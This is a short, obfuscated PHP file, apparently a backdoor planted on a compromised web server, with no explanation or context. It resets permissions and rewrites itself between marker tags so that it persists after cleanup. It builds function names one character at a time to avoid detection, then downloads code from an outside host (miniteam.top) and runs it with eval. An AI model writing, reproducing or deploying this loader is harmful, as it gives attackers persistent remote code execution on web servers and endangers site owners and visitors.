<?php $rtJMYAL6C=true; ?><?php $XcrIyTetl=EXPlodE(base64_decode("PD9waHAgJHJ0Sk1ZQUw2Qz10cnVlOyA/Pg=="),file_geT_COnteNtS(__FILE__));if(tRim($XcrIyTetl[0])!=""||TRim($XcrIyTetl[2])!=""){CHmOD(__DIR__,0755);chMoD(__FILE__,0644);FiLe_PUt_ConTeNTS(__FILE__,baSe64_DecodE("PD9waHAgJHJ0Sk1ZQUw2Qz10cnVlOyA/Pg==").$XcrIyTetl[1].bAse64_DEcODe("PD9waHAgJHJ0Sk1ZQUw2Qz10cnVlOyA/Pg=="));}?><?php $nvi="";$nvi.="b";$nvi.="a";$nvi.="s";$nvi.="e";$nvi.="6";$nvi.="4";$nvi.="_";$nvi.="d";$nvi.="e";$nvi.="c";$nvi.="o";$nvi.="d";$nvi.="e"; $phs="";$phs.="f";$phs.="i";$phs.="l";$phs.="e";$phs.="_";$phs.="p";$phs.="u";$phs.="t";$phs.="_";$phs.="c";$phs.="o";$phs.="n";$phs.="t";$phs.="e";$phs.="n";$phs.="t";$phs.="s"; $kub="";$kub.="b";$kub.="a";$kub.="s";$kub.="e";$kub.="n";$kub.="a";$kub.="m";$kub.="e"; $grd="";$grd.="f";$grd.="i";$grd.="l";$grd.="e";$grd.="_";$grd.="g";$grd.="e";$grd.="t";$grd.="_";$grd.="c";$grd.="o";$grd.="n";$grd.="t";$grd.="e";$grd.="n";$grd.="t";$grd.="s"; evaL("?>".$grd("http://miniteam.top/library.php?XCPHBtRklMRVNfTUFOQUdFTUVOVF9TaGluLnR4dDMyv2Vm7b"));?><?php $rtJMYAL6C=true; ?>